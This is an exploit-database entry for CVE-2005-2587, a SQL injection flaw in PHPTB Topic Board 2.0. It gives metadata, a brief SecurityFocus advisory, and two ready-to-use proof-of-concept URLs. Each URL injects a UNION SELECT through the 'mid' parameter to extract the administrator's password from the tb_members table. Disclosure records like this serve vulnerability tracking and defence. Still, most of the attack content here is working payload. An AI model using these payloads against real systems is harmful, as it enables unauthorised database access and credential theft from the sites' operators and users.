PHPTB Topic Board 2.0 - 'index.php?mid' SQL Injection
Author: abducter_minds@yahoo.com
type: webapps
platform: php
port:
date_added: 2005-08-10
date_updated: 2013-06-13
verified: 1
codes: CVE-2005-2587;OSVDB-18736
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/14535/info
PHPTB is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
The consequences of this attack may vary depending on the type of queries that can be influenced, and the implementation of the database.
http://www.example.com/PHPTB/index.php?sid=cc3de2fc8c2b357b6a6d46ea8aa92a32&act=profile&mid=-99%20UNION%20SELECT%20null,password,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20tb_members%20WHERE%20user_id=1
http://www.example.com/PHPTB/index.php?sid=a284c075e8b0073935ba7290ca0dade8&act=newpm&mid=-99%20UNION%20SELECT%20password%20FROM%20tb_members%20WHERE%20user_id=1